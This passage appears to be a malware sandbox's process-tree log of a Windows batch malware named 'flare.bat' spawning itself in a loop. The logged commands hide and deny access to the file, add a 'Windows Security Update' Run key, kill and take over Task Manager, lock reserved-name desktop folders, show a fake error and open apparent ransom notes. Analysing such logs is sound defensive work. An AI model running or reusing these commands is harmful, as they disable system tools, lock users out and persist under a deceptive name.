        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        11⤵
        
        PID:4220
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        11⤵
        
        PID:4316
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        11⤵
        
        PID:4956
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        11⤵
        
        PID:4456
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        11⤵
        Opens file in notepad (likely ransom note)
        
        PID:4500
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        11⤵
        
        PID:3176
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        11⤵
        
        PID:5096
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        11⤵
        
        PID:4388
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        11⤵
        
        PID:1868
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        11⤵
        
        PID:740
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        11⤵
        Modifies file permissions
        
        PID:3840
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        11⤵
        
        PID:1520
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        11⤵
        
        PID:2792
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        11⤵
        
        PID:3060
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        11⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3484
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        11⤵
        Opens file in notepad (likely ransom note)
        
        PID:3444
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        11⤵
        
        PID:556
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        12⤵
        
        PID:2768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        13⤵
        
        PID:4572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:3932
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        14⤵
        
        PID:4164
        
        C:\Windows\system32\net.exe
        
        net session
        14⤵
        
        PID:2956
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        15⤵
        
        PID:3744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        14⤵
        Kills process with taskkill
        
        PID:1072
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        14⤵
        Modifies file permissions
        
        PID:1852
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        14⤵
        Possible privilege escalation attempt
        
        PID:744
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        14⤵
        Modifies file permissions
        
        PID:1688
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        14⤵
        
        PID:2708
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        14⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1664
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        14⤵
        
        PID:1928
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        14⤵
        
        PID:3888
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        14⤵
        
        PID:2540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        14⤵
        
        PID:2112
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        14⤵
        
        PID:4412
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        14⤵
        Opens file in notepad (likely ransom note)
        
        PID:1960
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        14⤵
        Modifies file permissions
        
        PID:1028
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        14⤵
        
        PID:848
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        14⤵
        
        PID:1080
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        14⤵
        Possible privilege escalation attempt
        
        PID:4812
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        14⤵
        Modifies file permissions
        
        PID:3324
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        14⤵
        Possible privilege escalation attempt
        
        PID:2040
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        14⤵
        Possible privilege escalation attempt
        
        PID:8
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        14⤵
        
        PID:3296
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        14⤵
        
        PID:4920
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        14⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4404
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        14⤵
        Opens file in notepad (likely ransom note)
        
        PID:764
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        14⤵
        
        PID:2736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        15⤵
        
        PID:3548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        16⤵
        
        PID:3456
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        17⤵
        
        PID:4348
        
        C:\Windows\system32\net.exe
        
        net session
        17⤵
        
        PID:3680
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        18⤵
        
        PID:1764
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        17⤵
        Kills process with taskkill
        
        PID:1932
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        17⤵
        
        PID:2704
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        17⤵
        
        PID:4036
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        17⤵
        
        PID:1716
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        17⤵
        Possible privilege escalation attempt
        
        PID:1748
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        17⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4616
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        17⤵
        
        PID:5016
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        17⤵
        Possible privilege escalation attempt
        
        PID:1312
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        17⤵
        
        PID:3500
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        17⤵
        
        PID:3448
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        17⤵
        
        PID:2400
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        17⤵
        Opens file in notepad (likely ransom note)
        
        PID:2404
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        17⤵
        Modifies file permissions
        
        PID:1600
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        17⤵
        
        PID:3840
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        17⤵
        Modifies file permissions
        
        PID:4944
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        17⤵
        
        PID:3148
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        17⤵
        Modifies file permissions
        
        PID:4664
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        17⤵
        Possible privilege escalation attempt
        
        PID:1204
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        17⤵
        
        PID:1660
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        17⤵
        
        PID:1752
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        17⤵
        
        PID:1072
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        17⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3680
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        17⤵
        Opens file in notepad (likely ransom note)
        
        PID:744
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        17⤵
        
        PID:2708
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        18⤵
        
        PID:3672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        19⤵
        
        PID:3280
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        20⤵
        
        PID:2592
        
        C:\Windows\system32\net.exe
        
        net session
        20⤵
        
        PID:2956
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        21⤵
        
        PID:1176
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        20⤵
        Kills process with taskkill
        
        PID:1072
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        20⤵
        
        PID:1688
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        20⤵
        Possible privilege escalation attempt
        
        PID:1716
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        20⤵
        
        PID:3060
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        20⤵
        Possible privilege escalation attempt
        
        PID:844
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        20⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3484
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        20⤵
        Modifies file permissions
        
        PID:5088
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        20⤵
        Possible privilege escalation attempt
        
        PID:1808
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        20⤵
        
        PID:1560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        20⤵
        
        PID:2256
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        20⤵
        
        PID:4560
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        20⤵
        Opens file in notepad (likely ransom note)
        
        PID:5092
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        20⤵
        
        PID:5040
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        20⤵
        
        PID:1320
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        20⤵
        
        PID:4036
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        20⤵
        
        PID:2372
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        20⤵
        Possible privilege escalation attempt
        
        PID:3060
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        20⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2548
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        20⤵
        
        PID:5040
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        20⤵
        
        PID:4956
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        20⤵
        
        PID:456
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        20⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1936
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        20⤵
        Opens file in notepad (likely ransom note)
        
        PID:3548
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        20⤵
        
        PID:2368
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        21⤵
        
        PID:3856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        22⤵
        
        PID:1820
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        23⤵
        
        PID:2368
        
        C:\Windows\system32\net.exe
        
        net session
        23⤵
        
        PID:4536
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        24⤵
        
        PID:5040
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        23⤵
        Kills process with taskkill
        
        PID:5184
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        23⤵
        Possible privilege escalation attempt
        
        PID:5212
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        23⤵
        Modifies file permissions
        
        PID:5228
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        23⤵
        Modifies file permissions
        
        PID:5244
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        23⤵
        
        PID:5260
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        23⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5276
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        23⤵
        
        PID:5288
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        23⤵
        
        PID:5304
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        23⤵
        
        PID:5384
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        23⤵
        
        PID:5492
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        23⤵
        
        PID:5632
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        23⤵
        Opens file in notepad (likely ransom note)
        
        PID:5644
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        23⤵
        
        PID:5652
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        23⤵
        
        PID:5700
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        23⤵
        
        PID:5720
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        23⤵
        
        PID:5732
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        23⤵
        
        PID:5744
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        23⤵
        
        PID:5756
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        23⤵
        Possible privilege escalation attempt
        
        PID:5772
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        23⤵
        
        PID:5788
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        23⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5800
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        23⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5812
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        23⤵
        Opens file in notepad (likely ransom note)
        
        PID:5836
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        23⤵
        
        PID:5852
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        24⤵
        
        PID:5904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        25⤵
        
        PID:5980
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        26⤵
        
        PID:3260
        
        C:\Windows\system32\net.exe
        
        net session
        26⤵
        
        PID:5040
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        27⤵
        
        PID:5148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        26⤵
        Kills process with taskkill
        
        PID:5084
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        26⤵
        
        PID:5288
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        26⤵
        
        PID:5168
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        26⤵
        
        PID:1592
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        26⤵
        
        PID:4996
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        26⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5384
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        26⤵
        Modifies file permissions
        
        PID:5544
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        26⤵
        
        PID:5608
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        26⤵
        
        PID:5628
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        26⤵
        
        PID:5744
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        26⤵
        
        PID:5404
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        26⤵
        Opens file in notepad (likely ransom note)
        
        PID:5584
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        26⤵
        
        PID:5968
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        26⤵
        
        PID:5932
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        26⤵
        
        PID:3840
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        26⤵
        
        PID:1764
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        26⤵
        Possible privilege escalation attempt
        
        PID:4212
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        26⤵
        
        PID:1152
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        26⤵
        
        PID:2012
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        26⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4956
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        26⤵
        
        PID:5312
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        26⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5288
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        26⤵
        Opens file in notepad (likely ransom note)
        
        PID:5176
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        26⤵
        
        PID:5388
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        27⤵
        
        PID:6032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        28⤵
        
        PID:5328
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        29⤵
        
        PID:5580
        
        C:\Windows\system32\net.exe
        
        net session
        29⤵
        
        PID:5788
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        30⤵
        
        PID:5820
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        29⤵
        Kills process with taskkill
        
        PID:5992
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        29⤵
        
        PID:6048
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        29⤵
        Modifies file permissions
        
        PID:5340
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        29⤵
        Possible privilege escalation attempt
        
        PID:5332
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        29⤵
        
        PID:5628
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        29⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5656
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        29⤵
        
        PID:5540
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        29⤵
        
        PID:5292
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        29⤵
        Possible privilege escalation attempt
        
        PID:6048
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        29⤵
        
        PID:5180
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        29⤵
        
        PID:6048
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        29⤵
        Opens file in notepad (likely ransom note)
        
        PID:5340
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        29⤵
        
        PID:5180
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        29⤵
        
        PID:5272
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        29⤵
        Possible privilege escalation attempt
        
        PID:5504
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        29⤵
        
        PID:6184
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        29⤵
        Modifies file permissions
        
        PID:6264
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        29⤵
        
        PID:6276
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        29⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6288
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        29⤵
        Modifies file permissions
        
        PID:6300
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        29⤵
        Possible privilege escalation attempt
        
        PID:6312
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        29⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6324
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        29⤵
        Opens file in notepad (likely ransom note)
        
        PID:6344
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        29⤵
        
        PID:6360
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        30⤵
        
        PID:6412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        31⤵
        
        PID:6504
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        32⤵
        
        PID:6828
        
        C:\Windows\system32\net.exe
        
        net session
        32⤵
        
        PID:6844
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        33⤵
        
        PID:6860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        32⤵
        Kills process with taskkill
        
        PID:6876
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        32⤵
        Modifies file permissions
        
        PID:6904
        
